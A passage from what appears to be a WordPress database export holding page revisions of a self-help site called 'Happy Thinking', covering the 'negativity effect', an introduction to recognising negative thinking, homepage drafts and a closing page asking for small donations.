{"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negativity effect', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-15 12:57:32', '2023-06-15 12:57:32', '', 1616, 'https://www.happythinking.com/?p=1838', 0, 'revision', '', 0),
(1836, 1, '2023-06-15 07:12:10', '2023-06-15 07:12:10', '<!-- wp:paragraph -->\n<p>Let us start our discussions about various negative thinking patterns by discussing one that is very common. In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may develop a negative thinking pattern where negative events are given much more attention than positive events. In the example I gave, the person may focus on the negative event of losing the mobile phone, while mostly ignoring the â€œhappyâ€ event of having a salary increase. This type of thinking can make the person feel that things are worse than they really are as the minimised positive events donâ€™t counteract the emotional impact of negative events.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1834,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg" alt="" class="wp-image-1834"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A more â€œhelpfulâ€ way to think would have been to see both the positive and negative events in a more balanced way. Perhaps thinking, â€œYes, it''s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1835,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg" alt="" class="wp-image-1835"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Psychologists call this type of thinking, where one gives more importance to negative events when compared to positive events, the â€œnegativity effectâ€. The â€œnegativity effectâ€ type of negative thinking is very common and is an important one to understand as it may contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that your ancestor was daydreaming and walking without a care in the world, and then accidentally stepped on a tiger''s tail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>[450]</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If this ancestor survived the ensuing chase, it would be in his or her survival interest to not forget the negative event of stepping on a tiger''s tail. No more daydreaming while walking in the forest! While most of us donâ€™t walk amongst tigers and such, these tendencies, to focus on the negatives, may well be still persisting in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>[460]</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here is a short example of the â€œnegativity effectâ€ type of negative thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. This made him unnecessarily feel very sad about his situation.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, it''s important to recognise when your thinking is distorted by the negativity effect. As I mentioned before, Happy Thinking is about dealing with such negative thinking patterns. Once we have gone over the common types of negative thinking patterns, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negativity effect', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-15 07:12:10', '2023-06-15 07:12:10', '', 1616, 'https://www.happythinking.com/?p=1836', 0, 'revision', '', 0),
(1713, 1, '2023-06-04 19:10:14', '2023-06-04 19:10:14', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"align":"center","id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain â€œnegativeâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On this website, I will describe to you, in an easy to understand way, various types of negative thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to prevent such thinking from affecting you in a negative way. In essence, Happy Thinking is about not letting negative ways of thinking get in the way of your happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-04 19:10:14', '2023-06-04 19:10:14', '', 88, 'https://www.happythinking.com/?p=1713', 0, 'revision', '', 0),
(1716, 1, '2023-06-04 19:13:00', '2023-06-04 19:13:00', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œnegativeâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of negative thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change negative thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising negative thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-04 19:13:00', '2023-06-04 19:13:00', '', 1034, 'https://www.happythinking.com/?p=1716', 0, 'revision', '', 0),
(1715, 1, '2023-06-04 19:12:17', '2023-06-04 19:12:17', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œnegativeâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of negative thinking. This will help you to recognise such thinking when it happens in your mind.Â Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change negative thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising negative thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-04 19:12:17', '2023-06-04 19:12:17', '', 1034, 'https://www.happythinking.com/?p=1715', 0, 'revision', '', 0),
(1951, 1, '2023-06-21 17:28:04', '2023-06-21 17:28:04', '<!-- wp:paragraph -->\n<p>So, my friends, you have come to the end of this website and I hope you found it interesting and useful. However, in reality, this is not truly the end! Let me explain.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For many years, I planned to make this website about happy thinking. It had been a dream of mine for a long while. Unfortunately, all these years, the website only existed in my head. The reason for this is actually that I suffered from the negative thinking pattern of trying to be a perfectionist. Perfectionism made me fear failure, making me not even start this website. Then one day it dawned on me that actually if I did not overcome the negative thinking pattern of trying to be perfect, this website would never ever materialise. I, therefore, forced myself to get in front of my keyboard and started writing, without worrying about the outcome. Luckily things started flowing, and what you read is the version so far. I hope you liked it.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, I am determined to further work on this website in the coming months. I plan to add more negative thinking patterns and also more tools. I also plan to improve the material already present. To make the content easier and fun to read, I will be adding plenty of diagrams as well. Eventually, I will add a dedicated section containing loads of short examples demonstrating the various tools. I believe examples will go a long way in making things clearer. Finally, I also plan to add bits of wisdom from various sources, to help you along your journey to happiness. In essence, there will be lots more material&nbsp; and what I am saying is, â€œPlease visit this website again!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I do this website completely on my own using my own funds. If you are able to, I would be very grateful if you would consider donating the equivalent of one dollar to help with the running costs. To do so, you can go to the donate page by clicking the â€œdonateâ€ tab at the top.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I wish you bye for now.&nbsp; I sincerely hope to see you again soon. Happy Thinking!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Conclusion', '', 'inherit', 'closed', 'closed', '', '1667-revision-v1', '', '', '2023-06-21 17:28:04', '2023-06-21 17:28:04', '', 1667, 'https://www.happythinking.com/?p=1951', 0, 'revision', '', 0),
(1809, 1, '2023-06-13 09:29:30', '2023-06-13 09:29:30', '<!-- wp:image {"align":"center","id":1764,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking-070623.jpg" alt="" class="wp-image-1764"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind.&nbsp; While recognising negative thinking is important, you also need ways of dealing with such thinking. For this, I will share with you various mental techniques (â€œmental toolsâ€) that will help you to change negative thinking into more positive ways of thinking. These mental tools will be very practical so that you can use them in your day to day life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-13 09:29:30', '2023-06-13 09:29:30', '', 88, 'https://www.happythinking.com/?p=1809', 0, 'revision', '', 0),
(1723, 1, '2023-06-05 12:12:06', '2023-06-05 12:12:06', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"align":"center","id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On this website, I will describe to you, in an easy to understand way, various types of unhelpful thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to prevent such thinking from affecting you in a negative way. In essence, Happy Thinking is about not letting unhelpful ways of thinking get in the way of your happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-05 12:12:06', '2023-06-05 12:12:06', '', 88, 'https://www.happythinking.com/?p=1723', 0, 'revision', '', 0),
